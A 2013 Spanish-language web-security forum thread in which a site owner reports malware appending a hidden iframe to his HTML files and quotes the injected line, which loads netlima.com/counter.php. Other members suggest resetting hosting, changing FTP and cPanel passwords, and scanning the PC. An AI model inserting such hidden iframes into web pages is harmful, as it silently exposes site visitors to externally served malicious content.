virus en mi pagina web

Publicado en 'Seguridad Informática' por loboweb, 23 Feb 2013.

1. loboweb

loboweb Miembro frecuente

Registro:
    12 Dic 2009

Hay un virus que se mete en mi web y de vez en cuando crea archivos .html y en otros ya existentes les agrega un codigo al final de todo, despues de la etiqueta </html> le agrega lo siguiente
    <iframe src="http://netlima.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

que puedo hacer....

2. openroot

openroot Miembro maestro

Registro:
    11 Mar 2012
    cámbiate de proveedor y preferencia uno con cpanel actualizado o ispconfig 3 en debian linux.

3. fredyac

fredyac Miembro de plata

Registro:
    4 May 2010
    Solicita a tu proveedor resetear tu cuenta de hosting y tambien que le ponga una nueva clave al Cpanel, esto borrara todo tanto los archivos web como los correos, y arrancas de cero, claro se supone que tienes un respaldo de tu informacion y asegurate que tu PC esta con un buen antivirus. Actualiza los scripts que usas.

4. loboweb

loboweb Miembro frecuente

Registro:
    12 Dic 2009
    me dicen que el virus (o troyano) entra por el FTP y por alli cambia los archivos, yo uso el filezilla osea que el virus entra al filezilla pero si quito ese programa el virus ya no infectara a mi web.

5. sashahimmler

sashahimmler Miembro nuevo

Registro:
    14 Set 2012
    Pueden ser muchas cosas, desde un virus en tu pc(lo más probable) que infecta tus files hasta un archivo en tu web corriendo cada cierto tiempo (mediante el famoso "cron job", aunque es poco probable si es que tu proveedor ya verificó tu configuración).
    Lo primero que tienes que hacer es pasarle a tu pc un buen antivirus(Avast, AVG), un limpiador de spywares y al final chequear (desde el Cpanel de tu web) que no haya ningún archivo corriendo (pídele ayuda a tu proveedor).
    Finalmente, cambia las claves del ftp y Cpanel, verifica que cada html, php (o el script que fuese) esté limpio y sube todo de nuevo.

Suerte